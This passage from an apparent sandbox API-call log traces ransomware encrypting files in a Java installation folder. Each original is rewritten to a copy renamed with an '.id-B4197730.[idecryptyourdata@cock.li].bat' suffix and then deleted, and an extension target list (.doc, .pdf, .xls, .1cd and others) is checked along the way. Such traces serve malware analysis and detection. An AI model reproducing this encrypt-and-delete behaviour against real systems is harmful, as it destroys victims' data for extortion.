dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0196.952] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.952] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.952] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0196.952] GetLastError () returned 0x0 [0196.952] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x32840, lpOverlapped=0x0) returned 1 [0196.991] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x32850, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x32850, lpOverlapped=0x0) returned 1 [0196.995] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.995] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe6, lpOverlapped=0x0) returned 1 [0196.995] SetEndOfFile (hFile=0x39c) returned 1 [0196.996] CloseHandle (hObject=0x39c) returned 1 [0196.996] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.996] SetEndOfFile (hFile=0x38c) returned 1 [0196.998] CloseHandle (hObject=0x38c) returned 1 [0196.998] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.998] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaw.exe")) returned 1 [0196.998] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0196.999] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0196.999] lstrlenW (lpString=".doc") returned 4 [0196.999] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0196.999] lstrlenW (lpString=".docx") returned 5 [0196.999] lstrcmpiW (lpString1=".docx", lpString2="w.exe") returned -1 [0196.999] lstrlenW (lpString=".pdf") returned 4 [0196.999] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0196.999] lstrlenW (lpString=".xls") returned 4 [0196.999] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0196.999] lstrlenW (lpString=".xlsx") returned 5 [0196.999] lstrcmpiW (lpString1=".xlsx", lpString2="w.exe") returned -1 [0196.999] lstrlenW (lpString=".ppt") returned 4 [0196.999] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0196.999] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0196.999] lstrlenW (lpString=".zip") returned 4 [0196.999] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0196.999] lstrlenW (lpString=".rar") returned 4 [0196.999] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0196.999] lstrlenW (lpString=".bz2") returned 4 [0196.999] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0196.999] lstrlenW (lpString=".7z") returned 3 [0196.999] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0196.999] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0196.999] lstrlenW (lpString=".dbf") returned 4 [0196.999] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0196.999] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0196.999] lstrlenW (lpString=".1cd") returned 4 [0196.999] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0196.999] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0196.999] lstrlenW (lpString=".jpg") returned 4 [0197.000] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.000] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0197.000] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0197.000] lstrlenW (lpString=".doc") returned 4 [0197.000] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.000] lstrlenW (lpString=".docx") returned 5 [0197.000] lstrcmpiW (lpString1=".docx", lpString2="w.exe") returned -1 [0197.000] lstrlenW (lpString=".pdf") returned 4 [0197.000] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.000] lstrlenW (lpString=".xls") returned 4 [0197.000] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.000] lstrlenW (lpString=".xlsx") returned 5 [0197.000] lstrcmpiW (lpString1=".xlsx", lpString2="w.exe") returned -1 [0197.000] lstrlenW (lpString=".ppt") returned 4 [0197.000] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.000] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0197.000] lstrlenW (lpString=".zip") returned 4 [0197.000] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.000] lstrlenW (lpString=".rar") returned 4 [0197.000] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.000] lstrlenW (lpString=".bz2") returned 4 [0197.000] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.000] lstrlenW (lpString=".7z") returned 3 [0197.000] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.000] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0197.000] lstrlenW (lpString=".dbf") returned 4 [0197.000] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.000] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0197.000] lstrlenW (lpString=".1cd") returned 4 [0197.001] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.001] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javaw.exe") returned 48 [0197.001] lstrlenW (lpString=".jpg") returned 4 [0197.001] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.001] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.001] lstrlenW (lpString="java_crw_demo.dll") returned 17 [0197.001] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.002] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=29760) returned 1 [0197.002] CloseHandle (hObject=0x38c) returned 1 [0197.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll")) returned 0x20 [0197.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.002] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.002] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.002] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.002] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0197.248] GetLastError () returned 0x0 [0197.248] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x7440, lpOverlapped=0x0) returned 1 [0197.410] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x7450, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x7450, lpOverlapped=0x0) returned 1 [0197.412] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.412] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.412] SetEndOfFile (hFile=0x39c) returned 1 [0197.412] CloseHandle (hObject=0x39c) returned 1 [0197.412] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.412] SetEndOfFile (hFile=0x38c) returned 1 [0197.413] CloseHandle (hObject=0x38c) returned 1 [0197.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.414] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll")) returned 1 [0197.414] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.414] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.414] lstrlenW (lpString=".doc") returned 4 [0197.414] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.414] lstrlenW (lpString=".docx") returned 5 [0197.414] lstrcmpiW (lpString1=".docx", lpString2="o.dll") returned -1 [0197.414] lstrlenW (lpString=".pdf") returned 4 [0197.414] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.414] lstrlenW (lpString=".xls") returned 4 [0197.414] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.414] lstrlenW (lpString=".xlsx") returned 5 [0197.414] lstrcmpiW (lpString1=".xlsx", lpString2="o.dll") returned -1 [0197.414] lstrlenW (lpString=".ppt") returned 4 [0197.414] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.414] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.414] lstrlenW (lpString=".zip") returned 4 [0197.414] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.414] lstrlenW (lpString=".rar") returned 4 [0197.414] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.414] lstrlenW (lpString=".bz2") returned 4 [0197.414] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.414] lstrlenW (lpString=".7z") returned 3 [0197.414] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.414] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.414] lstrlenW (lpString=".dbf") returned 4 [0197.414] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.415] lstrlenW (lpString=".1cd") returned 4 [0197.415] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.415] lstrlenW (lpString=".jpg") returned 4 [0197.415] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.415] lstrlenW (lpString=".doc") returned 4 [0197.415] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.415] lstrlenW (lpString=".docx") returned 5 [0197.415] lstrcmpiW (lpString1=".docx", lpString2="o.dll") returned -1 [0197.415] lstrlenW (lpString=".pdf") returned 4 [0197.415] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.415] lstrlenW (lpString=".xls") returned 4 [0197.415] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.415] lstrlenW (lpString=".xlsx") returned 5 [0197.415] lstrcmpiW (lpString1=".xlsx", lpString2="o.dll") returned -1 [0197.415] lstrlenW (lpString=".ppt") returned 4 [0197.415] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.415] lstrlenW (lpString=".zip") returned 4 [0197.415] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.415] lstrlenW (lpString=".rar") returned 4 [0197.415] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.415] lstrlenW (lpString=".bz2") returned 4 [0197.415] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.415] lstrlenW (lpString=".7z") returned 3 [0197.415] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.415] lstrlenW (lpString=".dbf") returned 4 [0197.415] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.415] lstrlenW (lpString=".1cd") returned 4 [0197.415] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll") returned 56 [0197.416] lstrlenW (lpString=".jpg") returned 4 [0197.416] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.416] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0197.416] lstrlenW (lpString="jjs.exe") returned 7 [0197.416] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.416] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=15936) returned 1 [0197.416] CloseHandle (hObject=0x38c) returned 1 [0197.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe")) returned 0x20 [0197.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.417] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.417] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.417] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.417] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0197.417] GetLastError () returned 0x0 [0197.418] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x3e40, lpOverlapped=0x0) returned 1 [0197.476] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x3e50, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x3e50, lpOverlapped=0x0) returned 1 [0197.477] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.477] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe2, lpOverlapped=0x0) returned 1 [0197.477] SetEndOfFile (hFile=0x39c) returned 1 [0197.477] CloseHandle (hObject=0x39c) returned 1 [0197.477] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.477] SetEndOfFile (hFile=0x38c) returned 1 [0197.478] CloseHandle (hObject=0x38c) returned 1 [0197.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.479] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe")) returned 1 [0197.479] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.479] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.479] lstrlenW (lpString=".doc") returned 4 [0197.479] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.479] lstrlenW (lpString=".docx") returned 5 [0197.479] lstrcmpiW (lpString1=".docx", lpString2="s.exe") returned -1 [0197.479] lstrlenW (lpString=".pdf") returned 4 [0197.479] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.479] lstrlenW (lpString=".xls") returned 4 [0197.479] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.479] lstrlenW (lpString=".xlsx") returned 5 [0197.479] lstrcmpiW (lpString1=".xlsx", lpString2="s.exe") returned -1 [0197.479] lstrlenW (lpString=".ppt") returned 4 [0197.479] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.479] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.479] lstrlenW (lpString=".zip") returned 4 [0197.479] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.479] lstrlenW (lpString=".rar") returned 4 [0197.479] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.479] lstrlenW (lpString=".bz2") returned 4 [0197.480] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.480] lstrlenW (lpString=".7z") returned 3 [0197.480] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.480] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.480] lstrlenW (lpString=".dbf") returned 4 [0197.480] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.480] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.480] lstrlenW (lpString=".1cd") returned 4 [0197.480] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.480] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.480] lstrlenW (lpString=".jpg") returned 4 [0197.480] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.480] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.480] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.480] lstrlenW (lpString=".doc") returned 4 [0197.480] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.480] lstrlenW (lpString=".docx") returned 5 [0197.480] lstrcmpiW (lpString1=".docx", lpString2="s.exe") returned -1 [0197.480] lstrlenW (lpString=".pdf") returned 4 [0197.480] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.481] lstrlenW (lpString=".xls") returned 4 [0197.481] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.481] lstrlenW (lpString=".xlsx") returned 5 [0197.481] lstrcmpiW (lpString1=".xlsx", lpString2="s.exe") returned -1 [0197.481] lstrlenW (lpString=".ppt") returned 4 [0197.481] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.481] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.481] lstrlenW (lpString=".zip") returned 4 [0197.481] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.481] lstrlenW (lpString=".rar") returned 4 [0197.481] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.481] lstrlenW (lpString=".bz2") returned 4 [0197.481] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.481] lstrlenW (lpString=".7z") returned 3 [0197.481] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.481] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.481] lstrlenW (lpString=".dbf") returned 4 [0197.481] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.481] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.481] lstrlenW (lpString=".1cd") returned 4 [0197.481] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.481] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 46 [0197.481] lstrlenW (lpString=".jpg") returned 4 [0197.481] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.482] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0197.482] lstrlenW (lpString="jp2launcher.exe") returned 15 [0197.482] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.482] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=112192) returned 1 [0197.482] CloseHandle (hObject=0x38c) returned 1 [0197.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe")) returned 0x20 [0197.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.482] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0197.482] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.482] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.483] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0197.483] GetLastError () returned 0x0 [0197.483] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x1b640, lpOverlapped=0x0) returned 1 [0197.538] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x1b650, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x1b650, lpOverlapped=0x0) returned 1 [0197.540] ReadFile (in: hFile=0x38c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.540] WriteFile (in: hFile=0x39c, lpBuffer=0x4049020*, 